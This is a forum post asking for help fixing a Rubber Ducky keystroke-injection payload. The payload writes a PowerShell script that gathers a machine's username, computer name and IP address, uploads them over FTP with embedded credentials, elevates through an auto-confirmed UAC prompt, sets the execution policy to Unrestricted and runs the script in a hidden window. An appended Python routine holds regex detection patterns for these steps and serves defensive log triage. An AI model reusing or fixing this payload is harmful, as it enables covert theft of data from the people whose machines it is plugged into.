tats
Posts posted by tats

  1. Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a PowerShell script. Never works the way I want after encoding it and using the BIN file. The RUN window never opens, and neither does Notepad. It randomly opens some Excel file on the desktop and writes the STRING values there. The PowerShell commands at the end of the script seem to execute fine in the RUN window, but since the PS1 file is never created using Notepad, they are useless. I feel it might have something to do with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the PowerShell script works otherwise. For encoding, I have tried both the encoder on the DUCKTOOLKIT site and the local JAR encoder. I have also tried with all DELAYs longer than 1000. Need help figuring out what's going wrong.

    NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

    Ducky Script -

    DELAY 500
    GUI R
    DELAY 500
    STRING notepad
    DELAY 500
    ENTER
    DELAY 1000
    STRING $username = $env:username
    ENTER
    STRING $computername = $env:computername
    ENTER
    STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
    ENTER
    STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
    ENTER
    STRING $File = "C:\Users\$username\$computername.txt"
    ENTER
    STRING "Computername: $computername" >> $File
    ENTER
    STRING "Username: $username" >> $File
    ENTER
    STRING "IP-Address: $ipaddress" >> $File
    ENTER
    STRING "Time: $timestamp" >> $File
    ENTER
    STRING "`n" >> $File
    ENTER
    STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
    ENTER
    STRING $webclient = New-Object System.Net.WebClient
    ENTER
    STRING $uri = New-Object System.Uri($ftp)
    ENTER
    STRING $webclient.UploadFile($uri, $File)
    ENTER
    STRING $wshell = New-Object -ComObject Wscript.Shell
    ENTER
    STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
    DELAY 3000
    CTRL s
    DELAY 1000
    STRING %TEMP%\cache.ps1
    TAB
    DELAY 1000
    DOWNARROW
    DOWNARROW
    DELAY 2000
    ENTER
    ALT s
    DELAY 1000
    ALT F4
    DELAY 1000
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 500
    ALT y
    DELAY 500
    STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
    ENTER
    DELAY 500
    STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
    ENTER
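From the defensive side, as an added example that is not part of the post above and not Hak5's code: every behaviour this payload depends on, relaxing the execution policy, an ftp:// URL with embedded credentials, WebClient.UploadFile, a hidden-window PowerShell launched from the user's Temp folder, and a runAs elevation, is visible in PowerShell script-block logging (Event ID 4104) or process-creation logging. The triage routine below runs over constructed log entries; the function names, indicator labels and sample entries are my own.

```python
import re

# Constructed sample entries, modelled on what PowerShell script-block logging
# (Event ID 4104) and process-creation logging would record. Not real logs.
SAMPLE_LOG_ENTRIES = [
    "Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false",
    '$webclient = New-Object System.Net.WebClient; $uri = New-Object System.Uri("ftp://username:password@server/Ducky/HOST1.txt"); $webclient.UploadFile($uri, $File)',
    r"Get-ChildItem C:\Users\alice\Documents",
    "Start-Process cmd -Verb runAs",
    r"powershell.exe -windowstyle hidden -File C:\Users\alice\AppData\Local\Temp\cache.ps1",
]

# Indicator labels (my own naming) paired with the pattern that detects each
# behaviour the payload in the post relies on.
INDICATORS = [
    ("execution-policy-relaxed",
     re.compile(r"Set-ExecutionPolicy\s+'?Unrestricted'?", re.I)),
    ("ftp-url-with-embedded-credentials",
     re.compile(r"ftp://[^/\s:]+:[^@\s]+@", re.I)),
    ("webclient-upload",
     re.compile(r"\.UploadFile\(", re.I)),
    ("hidden-window-script-from-temp",
     re.compile(r"-windowstyle\s+hidden\s+-File\s+\S*\\Temp\\", re.I)),
    ("uac-elevation-request",
     re.compile(r"Start-Process\s+\S+\s+-Verb\s+runAs", re.I)),
]


def score_entry(text):
    """Return the labels of every indicator that matches one log entry."""
    return [label for label, pattern in INDICATORS if pattern.search(text)]


def triage(entries, threshold=1):
    """Return (index, labels) for each entry hitting at least `threshold` indicators."""
    hits = []
    for index, text in enumerate(entries):
        labels = score_entry(text)
        if len(labels) >= threshold:
            hits.append((index, labels))
    return hits


if __name__ == "__main__":
    for index, labels in triage(SAMPLE_LOG_ENTRIES):
        print(f"entry {index}: {', '.join(labels)}")
```

Raising `threshold` to 2 keeps only entries that combine several of these behaviours, which is the shape of the exfiltration step here and cuts noise from a lone Set-ExecutionPolicy run by an administrator.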
